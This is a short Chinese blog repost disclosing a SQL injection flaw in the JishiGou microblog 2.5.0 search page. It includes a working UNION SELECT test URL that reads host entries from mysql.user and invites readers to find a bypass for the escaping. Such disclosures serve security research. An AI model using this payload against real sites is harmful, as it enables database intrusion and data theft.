无意中发现的,只测试了[记事狗微博客系统2.5.0 UTF8 Build 20110130] 因为系统会将]_] 转换为]\_] 所以像]load_file]、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。 测试方法: http://HdhCmsTest2cto测试数据 /index.php?code=usertag&mod=search&usertag=1″/**/and/**/1=2/**/union/**/select/**/1,2,host,4/**/from/**/ mysql .user%23 EXP不会造成严重影响,且仅供研究之用 摘自 疯子博客|Madman@SysCiC.TeAm
查看更多关于记事狗2.5.0鸡肋注入漏洞 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13123